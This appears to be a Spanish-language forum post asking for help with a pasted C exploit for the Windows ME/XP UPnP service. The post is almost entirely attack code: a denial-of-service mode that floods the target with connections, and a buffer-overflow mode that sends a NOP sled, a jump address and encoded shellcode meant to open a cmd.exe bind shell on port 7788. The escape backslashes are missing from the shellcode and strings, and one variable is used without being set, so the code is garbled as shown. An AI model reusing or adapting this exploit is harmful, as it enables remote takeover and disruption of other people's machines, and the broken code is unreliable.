Este es codigo susodicho:
/*
* WinME/XP UPNP dos & overflow
*
* Run: ./XPloit host <option>
*
* Windows run the "Universal Plug and Play technology" service
* at port 5000. In the future this will allow for seemless
* connectivity of various devices such as a printer.
* This service have a DoS and a buffer overflow I exploit here.
*
* PD: the -e option spawns a cmd.exe shell on port 7788 coded by isno
*
* Author: Gabriel Maggiotti
* Email:
[email protected]
* Webpage: http://qb0x.net
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <unistd.h>
#include <fcntl.h>
#define MAX 10000
#define PORT 5000
#define FREEZE 512
#define NOP 0x43 //inc ebx, instead of 0x90
/************************************************** *************************/
int main(int argc,char *argv[])
{
int sockfd[MAX];
char sendXP[]="XP";
char jmpcode[281], execode[840],request[2048];
char *send_buffer;
int num_socks;
int bindport;
int i;
int port;
unsigned char shellcode[] =
"x90xebx03x5dxebx05xe8xf8xffxffxffx83xc5x15x90x90"
"x90x8bxc5x33xc9x66xb9x10x03x50x80x30x97x40xe2xfa"
"x7ex8ex95x97x97xcdx1cx4dx14x7cx90xfdx68xc4xf3x36"
"x97x97x97x97xc7xf3x1exb2x97x97x97x97xa4x4cx2cx97"
"x97x77xe0x7fx4bx96x97x97x16x6cx97x97x68x28x98x14"
"x59x96x97x97x16x54x97x97x96x97xf1x16xacxdaxcdxe2"
"x70xa4x57x1cxd4xabx94x54xf1x16xafxc7xd2xe2x4ex14"
"x57xefx1cxa7x94x64x1cxd9x9bx94x5cx16xaexdcxd2xc5"
"xd9xe2x52x16xeex93xd2xdbxa4xa5xe2x2bxa4x68x1cxd1"
"xb7x94x54x1cx5cx94x9fx16xaexd0xf2xe3xc7xe2x9ex16"
"xeex93xe5xf8xf4xd6xe3x91xd0x14x57x93x7cx72x94x68"
"x94x6cx1cxc1xb3x94x6dxa4x45xf1x1cx80x1cx6dx1cxd1"
"x87xdfx94x6fxa4x5ex1cx58x94x5ex94x5ex94xd9x8bx94"
"x5cx1cxaex94x6cx7exfex96x97x97xc9x10x60x1cx40xa4"
"x57x60x47x1cx5fx65x38x1exa5x1axd5x9fxc5xc7xc4x68"
"x85xcdx1exd5x93x1axe5x82xc5xc1x68xc5x93xcdxa4x57"
"x3bx13x57xe2x6exa4x5ex1dx99x13x5exe3x9exc5xc1xc4"
"x68x85xcdx3cx75x7fxd1xc5xc1x68xc5x93xcdx1cx4fxa4"
"x57x3bx13x57xe2x6exa4x5ex1dx99x17x6ex95xe3x9exc5"
"xc1xc4x68x85xcdx3cx75x70xa4x57xc7xd7xc7xd7xc7x68"
"xc0x7fx04xfdx87xc1xc4x68xc0x7bxfdx95xc4x68xc0x67"
"xa4x57xc0xc7x27x9bx3cxcfx3cxd7x3cxc8xdfxc7xc0xc1"
"x3axc1x68xc0x57xdfxc7xc0x3axc1x3axc1x68xc0x57xdf"
"x27xd3x1ex90xc0x68xc0x53xa4x57x1cxd1x63x1exd0xab"
"x1exd0xd7x1cx91x1exd0xafxa4x57xf1x2fx96x96x1exd0"
"xbbxc0xc0xa4x57xc7xc7xc7xd7xc7xdfxc7xc7x3axc1xa4"
"x57xc7x68xc0x5fx68xe1x67x68xc0x5bx68xe1x6bx68xc0"
"x5bxdfxc7xc7xc4x68xc0x63x1cx4fxa4x57x23x93xc7x56"
"x7fx93xc7x68xc0x43x1cx67xa4x57x1cx5fx22x93xc7xc7"
"xc0xc6xc1x68xe0x3fx68xc0x47x14xa8x96xebxb5xa4x57"
"xc7xc0x68xa0xc1x68xe0x3fx68xc0x4bx9cx57xe3xb8xa4"
"x57xc7x68xa0xc1xc4x68xc0x6fxfdxc7x68xc0x77x7cx5f"
"xa4x57xc7x23x93xc7xc1xc4x68xc0x6bxc0xa4x5exc6xc7"
"xc1x68xe0x3bx68xc0x4fxfdxc7x68xc0x77x7cx3dxc7x68"
"xc0x73x7cx69xcfxc7x1exd5x65x54x1cxd3xb3x9bx92x2f"
"x97x97x97x50x97xefxc1xa3x85xa4x57x54x7cx7bx7fx75"
"x6ax68x68x7fx05x69x68x68xdcxc1x70xe0xb4x17x70xe0"
"xdbxf8xf6xf3xdbxfexf5xe5xf6xe5xeexd6x97xdcxd2xc5"
"xd9xd2xdbxa4xa5x97xd4xe5xf2xf6xe3xf2xc7xfexe7xf2"
"x97xd0xf2xe3xc4xe3xf6xe5xe3xe2xe7xdexf9xf1xf8xd6"
"x97xd4xe5xf2xf6xe3xf2xc7xe5xf8xf4xf2xe4xe4xd6x97"
"xd4xfbxf8xe4xf2xdfxf6xf9xf3xfbxf2x97xc7xf2xf2xfc"
"xd9xf6xfaxf2xf3xc7xfexe7xf2x97xd0xfbxf8xf5xf6xfb"
"xd6xfbxfbxf8xf4x97xc0xe5xfexe3xf2xd1xfexfbxf2x97"
"xc5xf2xf6xf3xd1xfexfbxf2x97xc4xfbxf2xf2xe7x97xd2"
"xefxfexe3xc7xe5xf8xf4xf2xe4xe4x97x97xc0xc4xd8xd4"
"xdcxa4xa5x97xe4xf8xf4xfcxf2xe3x97xf5xfexf9xf3x97"
"xfbxfexe4xe3xf2xf9x97xf6xf4xf4xf2xe7xe3x97xe4xf2"
"xf9xf3x97xe5xf2xf4xe1x97x95x97x89xfbx97x97x97x97"
"x97x97x97x97x97x97x97x97xf4xfaxf3xb9xf2xefxf2x97"
"x68x68x68x68";
struct hostent *he;
struct sockaddr_in their_addr;
if(argc!=3)
{
fprintf(stderr,"usage:%s <hostname> <command>n",argv[0]);
fprintf(stderr,"-f freeze the machine.n");
fprintf(stderr,"-e exploit.n");
exit(1);
}
if(strstr(argv[2],"-f")) {
num_socks=FREEZE;
send_buffer=sendXP;
printf("Usando la opcion -f:\n");
}
if(strstr(argv[2],"-e")) {
printf("Usando la opcion -e:\n");
num_socks=1;
send_buffer=request;
bindport^=0x9797;
shellcode[778]= (bindport) & 0xff;
shellcode[779]= (bindport >> 8) & 0xff;
printf("paso 1");
for(i = 0; i < 268; i++)
jmpcode[i] = (char)NOP;
jmpcode[268] = (char)0x4d;
jmpcode[269] = (char)0x3f;
jmpcode[270] = (char)0xe3;
jmpcode[271] = (char)0x77;
jmpcode[272] = (char)0x90;
jmpcode[273] = (char)0x90;
jmpcode[274] = (char)0x90;
jmpcode[275] = (char)0x90;
//jmp [ebx+0x64], jump to execute shellcode
jmpcode[276] = (char)0xff;
jmpcode[277] = (char)0x63;
jmpcode[278] = (char)0x64;
jmpcode[279] = (char)0x90;
jmpcode[280] = (char)0x00;
printf("paso 2");
for(i = 0; i < 32; i++)
execode[i] = (char)NOP;
execode[32]=(char)0x00;
strcat(execode, shellcode);
printf("paso 3");
snprintf(request, 2048, "%s%srnrn", jmpcode, execode);
printf("FIN");
}
if((he=gethostbyname(argv[1]))==NULL)
{
perror("gethostbyname");
exit(1);
}
/************************************************** *************************/
for(i=0; i<num_socks;i++)
if( (sockfd[i]=socket(AF_INET,SOCK_STREAM,0)) == -1) {
perror("socket"); exit(1);
}
their_addr.sin_family=AF_INET;
their_addr.sin_port=htons(PORT);
their_addr.sin_addr=*((struct in_addr*)he->h_addr);
bzero(&(their_addr.sin_zero),8);
for(i=0; i<num_socks;i++)
if( connect(sockfd[i],(struct sockaddr*)&their_addr, sizeof(struct sockaddr))==-1)
{
perror("connect");
exit(1);
}
for(i=0; i<num_socks;i++)
if(send(sockfd[i],send_buffer,strlen(send_buffer),0) ==-1)
{
perror("send");
exit(0);
}
for(i=0; i<num_socks;i++)
close(sockfd[i]);
return 0;
}
Espero que puedas ayudarme.